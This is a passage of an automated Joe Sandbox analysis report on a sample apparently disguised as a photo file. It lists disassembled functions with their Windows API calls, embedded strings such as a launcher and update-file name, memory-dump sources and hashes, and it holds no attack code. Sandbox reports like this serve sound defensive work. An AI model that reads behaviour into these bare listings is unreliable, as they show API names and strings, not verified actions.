                                                                • Opcode ID: 08953e861b5d9d855a4c52060e885c24a9be852e1ebda5a20fe21b1de79d05f2
                                                                • Instruction ID: d132190d523e6c610880d59674860aeb8617bf192451e52ed45d954e9d20bd71
                                                                • Opcode Fuzzy Hash: 08953e861b5d9d855a4c52060e885c24a9be852e1ebda5a20fe21b1de79d05f2
                                                                • Instruction Fuzzy Hash: A1418D715083049FD710EF65EC85A9EBBE8BF85304F40493EF586A31A2CB789948CB5A
                                                                Function 0041B1CF Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 98libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(msimg32.dll,AlphaBlend,?,?,?,?,?,?,?,0041E78E,?,?,00000000,?,?), ref: 0041B1F2
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041B1F9
                                                                • CreateCompatibleDC.GDI32(?), ref: 0041B234
                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041B244
                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0041B258
                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041B2D9
                                                                • DeleteObject.GDI32(00000000), ref: 0041B2DC
                                                                • DeleteDC.GDI32(00000000), ref: 0041B2E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Object$DeleteSelect$AddressCompatibleCreateHandleModuleProc
                                                                • String ID: AlphaBlend$msimg32.dll
                                                                • API String ID: 2793247382-3639726679
                                                                • Opcode ID: a86be3e0632a010cc679e19f5fcf46ea4960a7919b63f37b8a7895b979e49a66
                                                                • Instruction ID: 1451a2618604e31c8b55ecf5fc2d8253631e260b3ad40578a665845012ab9646
                                                                • Opcode Fuzzy Hash: a86be3e0632a010cc679e19f5fcf46ea4960a7919b63f37b8a7895b979e49a66
                                                                • Instruction Fuzzy Hash: 98318E3150020AAFCF059FA9DC4DADE3FB6FF08348F044159F911A21A0DB78E859DBA4
                                                                Function 0040C6A9 Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0040C6B0
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040C6BA
                                                                • int.LIBCPMT ref: 0040C6D1
                                                                  • Part of subcall function 0040C366: std::_Lockit::_Lockit.LIBCPMT ref: 0040C377
                                                                • ctype.LIBCPMT ref: 0040C6F4
                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0040C708
                                                                • __CxxThrowException@8.LIBCMT ref: 0040C716
                                                                • std::locale::facet::_Incref.LIBCPMT ref: 0040C726
                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0040C72C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exception
                                                                • String ID: bad cast$|b
                                                                • API String ID: 3349589501-2604913611
                                                                • Opcode ID: fad7dae78dcca1d96916179db2ac7afcd4c2ef1567c3379d1a8122d3822b52b0
                                                                • Instruction ID: d1238144ad46c2a55220ef9650f5b51d1d57fbe8023d9273b1e86d3eca0c1279
                                                                • Opcode Fuzzy Hash: fad7dae78dcca1d96916179db2ac7afcd4c2ef1567c3379d1a8122d3822b52b0
                                                                • Instruction Fuzzy Hash: B101A171800615DBCF04FBA188829BEB736AB45724F144A2FF4117B2D2DF3C9E018B59
                                                                Function 1000CEBA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 284COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _strlen_write_string
                                                                • String ID: -$@$g
                                                                • API String ID: 2634636689-2189933660
                                                                • Opcode ID: be28343a0fb38a459043186707ea9a0e161b2b7534ceeda36e0d4643779f1765
                                                                • Instruction ID: dcfe885c60da1d689763bf747028968c0ea12be6d10f264e12b020a726d7a9c3
                                                                • Opcode Fuzzy Hash: be28343a0fb38a459043186707ea9a0e161b2b7534ceeda36e0d4643779f1765
                                                                • Instruction Fuzzy Hash: 0DC15871C0536E9AEB60DB54CC88BECBBB4EB15394F1001EAD808A6159CB749FC5CF61
                                                                Function 024728BD Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 236fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 02472903
                                                                • _memset.LIBCMT ref: 02472915
                                                                • _memset.LIBCMT ref: 02472924
                                                                • _memset.LIBCMT ref: 02472B19
                                                                • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000001,00000000), ref: 02472BC3
                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02472BEA
                                                                • FlushFileBuffers.KERNEL32(00000005), ref: 02472BF6
                                                                • CloseHandle.KERNEL32(00000005), ref: 02472C02
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset$File$BuffersCloseCreateFlushHandleWrite
                                                                • String ID: <
                                                                • API String ID: 2144675991-4251816714
                                                                • Opcode ID: fa892f95ba6b4a3744a8da890ffc6a4cdfeaaf52ca20d0832582be61c214c1f8
                                                                • Instruction ID: 89dd0023997dff200736b955e161e23f87d1028d14924e3b27d27c037b02dbeb
                                                                • Opcode Fuzzy Hash: fa892f95ba6b4a3744a8da890ffc6a4cdfeaaf52ca20d0832582be61c214c1f8
                                                                • Instruction Fuzzy Hash: DA91A875800228AFEB219F65CC849EABBFDFB09355F04C1EAF919A2150DB719F858F50
                                                                Function 004098AD Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 175COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _setlocale.LIBCMT ref: 004098F9
                                                                  • Part of subcall function 004017BC: _wcslen.LIBCMT ref: 004017D5
                                                                • _setlocale.LIBCMT ref: 004099F1
                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00409A28
                                                                • _setlocale.LIBCMT ref: 00409AB3
                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00409AE9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _setlocale$Ios_base_dtorstd::ios_base::_$_wcslen
                                                                • String ID: %s\%s$Chinese-simplified$MainDlg.cpp$ywupdate.ini
                                                                • API String ID: 4179029128-2623660508
                                                                • Opcode ID: ef0f58b4775ac1e25dad6e5ad4aef5a596fd46d2834218183988a181c7d37ee1
                                                                • Instruction ID: 54e8baa38262fff3dacc6218f166178da1e43d79c36ecc973c51f02ac846c9bd
                                                                • Opcode Fuzzy Hash: ef0f58b4775ac1e25dad6e5ad4aef5a596fd46d2834218183988a181c7d37ee1
                                                                • Instruction Fuzzy Hash: 666192711083809ED330EB65C886FDBBBE8EF85704F10492EF599671D2DB786845CB6A
                                                                Function 0040793F Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 125sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00407946
                                                                  • Part of subcall function 00402D76: __EH_prolog3.LIBCMT ref: 00402D7D
                                                                  • Part of subcall function 00402D3B: __EH_prolog3.LIBCMT ref: 00402D42
                                                                • Sleep.KERNEL32(00000014), ref: 00407991
                                                                • _wcslen.LIBCMT ref: 00407A56
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$H_prolog3_Sleep_wcslen
                                                                • String ID: --tgid $%s -i "%d" -d$%s\%s$DuoyiLauncher.exe$MainDlg.cpp$progress_time:%d
                                                                • API String ID: 1194231322-735624144
                                                                • Opcode ID: 2840390d12b51bc2931c3511ebd94c8a4cebd6367f8dd7ab70b37b55b3963d9a
                                                                • Instruction ID: d106507634cd95dd3fcdcb1c6a2f10815ad8b4a60f0bb070881bad1590434550
                                                                • Opcode Fuzzy Hash: 2840390d12b51bc2931c3511ebd94c8a4cebd6367f8dd7ab70b37b55b3963d9a
                                                                • Instruction Fuzzy Hash: 0E41A531D04204ABDB10EBA5CC4AFDE7B79EF46318F14407AF509BB1D2CA796941CB69
                                                                Function 0040B7C1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0040B7C8
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040B7D2
                                                                • int.LIBCPMT ref: 0040B7E9
                                                                  • Part of subcall function 0040C366: std::_Lockit::_Lockit.LIBCPMT ref: 0040C377
                                                                • messages.LIBCPMT ref: 0040B80C
                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0040B820
                                                                • __CxxThrowException@8.LIBCMT ref: 0040B82E
                                                                • std::locale::facet::_Incref.LIBCPMT ref: 0040B83E
                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0040B844
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowmessagesstd::bad_exception::bad_exception
                                                                • String ID: bad cast
                                                                • API String ID: 3217876713-3145022300
                                                                • Opcode ID: 09d1b2f9abe9668f6534c5132c07639039ac8d4651c094d88da903db78eb7421
                                                                • Instruction ID: 51c8c22a439e9e62170134aa1c4b36f2040e409550bea0f8aac65c9804176191
                                                                • Opcode Fuzzy Hash: 09d1b2f9abe9668f6534c5132c07639039ac8d4651c094d88da903db78eb7421
                                                                • Instruction Fuzzy Hash: 3401827190060597CF04FBA1C8825BDB636EB51724F14452EF4117B2E1DF3C9A01879D
                                                                Function 0046ADA0 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 169COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,3D09168B,00000000,00000000,00000000,?,00000000,005988C8,000000FF,?,0045CA5D,00000000,?,?,00402D32,00000000), ref: 0046ADD6
                                                                • InitializeCriticalSection.KERNEL32(00632228,3D09168B,00000000,00000000,00000000,?,00000000,005988C8,000000FF,?,0045CA5D,00000000,?,?,00402D32,00000000), ref: 0046AE11
                                                                • EnterCriticalSection.KERNEL32(00632228), ref: 0046AE48
                                                                • LeaveCriticalSection.KERNEL32(00632228), ref: 0046AE77
                                                                • InitializeCriticalSection.KERNEL32(006321FC), ref: 0046AEE3
                                                                • EnterCriticalSection.KERNEL32(006321FC), ref: 0046AF21
                                                                • LeaveCriticalSection.KERNEL32(006321FC), ref: 0046AF50
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0046AFF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeave$Initialize
                                                                • String ID: CCurlWorkshop::UnInit() %x$http\CurlWorkshop.cpp
                                                                • API String ID: 3564333830-3771068999
                                                                • Opcode ID: 0f1557f6e77aa75fb7a421d733169157fa3e6b0b4657767af979f4ebf8e11415
                                                                • Instruction ID: f14cbeff68335664dd4282c452c15967461933fc419e741b2fe6613b0f05141a
                                                                • Opcode Fuzzy Hash: 0f1557f6e77aa75fb7a421d733169157fa3e6b0b4657767af979f4ebf8e11415
                                                                • Instruction Fuzzy Hash: 536136B1A00302EFC704EF54ED85A1BBBB2FB15304F054A1AEA1153761D379AA44CBE7
                                                                Function 02472E16 Relevance: 15.2, APIs: 10, Instructions: 151comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 02472E28
                                                                • CoInitialize.OLE32(00000000), ref: 02472E2F
                                                                • CoCreateInstance.COMBASE(1001BAA4,00000000,00000001,1001BA94,?), ref: 02472E51
                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 02472F0F
                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02472F22
                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02472F31
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$Bound$AccessCreateDataInitInitializeInstanceVariant
                                                                • String ID:
                                                                • API String ID: 1776067534-0
                                                                • Opcode ID: 79661aefa36f05e11d082444c745240cc05e8509a7cb606758af6a29bcda15af
                                                                • Instruction ID: 31c1b4b960d5b1f81ab15a9b6099d06fddb82a4d02fd9ca91ca3a8da25de98cf
                                                                • Opcode Fuzzy Hash: 79661aefa36f05e11d082444c745240cc05e8509a7cb606758af6a29bcda15af
                                                                • Instruction Fuzzy Hash: 75512C71A00619AFEB01DFA5CC88AEEBB79FF49704F004455FE16EB210DB71D9058B90
                                                                Function 10002E12 Relevance: 15.2, APIs: 10, Instructions: 151comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 10002E24
                                                                • CoInitialize.OLE32(00000000), ref: 10002E2B
                                                                • CoCreateInstance.COMBASE(1001BAA4,00000000,00000001,1001BA94,?), ref: 10002E4D
                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 10002F0B
                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 10002F1E
                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 10002F2D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$Bound$AccessCreateDataInitInitializeInstanceVariant
                                                                • String ID:
                                                                • API String ID: 1776067534-0
                                                                • Opcode ID: 79661aefa36f05e11d082444c745240cc05e8509a7cb606758af6a29bcda15af
                                                                • Instruction ID: 22d648866f7fc07f360164d737246109097e3e6bd3236689373f1f3363e173f2
                                                                • Opcode Fuzzy Hash: 79661aefa36f05e11d082444c745240cc05e8509a7cb606758af6a29bcda15af
                                                                • Instruction Fuzzy Hash: CB513D35A0061AAFEB01DFA4CC88AAEBBB9FF05784F104469FE05EB214D771D9058B50
                                                                Function 0046AB70 Relevance: 15.1, APIs: 8, Strings: 2, Instructions: 144COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(0045C9E8,3D09168B,00000000,?,759113C0,?,00000000,005988C8,000000FF,?,0045C9A4,00000000,?,?,00402B2D,00000000), ref: 0046ABA6
                                                                • InitializeCriticalSection.KERNEL32(00632228,3D09168B,00000000,?,759113C0,?,00000000,005988C8,000000FF,?,0045C9A4,00000000,?,?,00402B2D,00000000), ref: 0046ABF8
                                                                • EnterCriticalSection.KERNEL32(00632228), ref: 0046AC2B
                                                                • LeaveCriticalSection.KERNEL32(00632228), ref: 0046AC5A
                                                                • InitializeCriticalSection.KERNEL32(006321FC,?,?,?,?,0045C9A4,00000000,?,?,00402B2D,00000000,000000FF), ref: 0046ACCC
                                                                • EnterCriticalSection.KERNEL32(006321FC,?,?,?,?,?,0045C9A4), ref: 0046AD06
                                                                • LeaveCriticalSection.KERNEL32(006321FC,?,?,?,?,?,0045C9A4), ref: 0046AD3A
                                                                • LeaveCriticalSection.KERNEL32(0045C9E8,3D09168B,00000000,?,759113C0,?,00000000,005988C8,000000FF,?,0045C9A4,00000000,?,?,00402B2D,00000000), ref: 0046AD7A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeave$Initialize
                                                                • String ID: CCurlWorkshop::Init() %x$http\CurlWorkshop.cpp
                                                                • API String ID: 3564333830-1598939202
                                                                • Opcode ID: 5053ac1808c65d4553d40db2eaab9c47fa4f787e85a128497cbe4b3854faaec8
                                                                • Instruction ID: 309c85d0fde1beec05173b6a46cc85d833e963c0daccefa8eb9327015fede420
                                                                • Opcode Fuzzy Hash: 5053ac1808c65d4553d40db2eaab9c47fa4f787e85a128497cbe4b3854faaec8
                                                                • Instruction Fuzzy Hash: E55188B1A00302AFC700EF54ED45A5BBBF2FB15304F01061AEA11633A1D3B9AA44DBE7
                                                                Function 00415535 Relevance: 15.1, APIs: 10, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Object$Select_memset$CreateDeleteFontIndirectMetricsStockText_wcsncpy
                                                                • String ID:
                                                                • API String ID: 834914290-0
                                                                • Opcode ID: d3b25719cd1ee5527e51815aac80c65e7d078bc90ee7c5c70b23cf9903a037e9
                                                                • Instruction ID: 9c0b798c775ff2140a4024922cb965b632af508315f2eb7cdaae09f623ea9313
                                                                • Opcode Fuzzy Hash: d3b25719cd1ee5527e51815aac80c65e7d078bc90ee7c5c70b23cf9903a037e9
                                                                • Instruction Fuzzy Hash: 2741E271900749EFDB01EFB5CC48BDEBBB9BF45304F04401AE809AB252D7789985CBA9
                                                                Function 00415421 Relevance: 15.1, APIs: 10, Instructions: 89COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
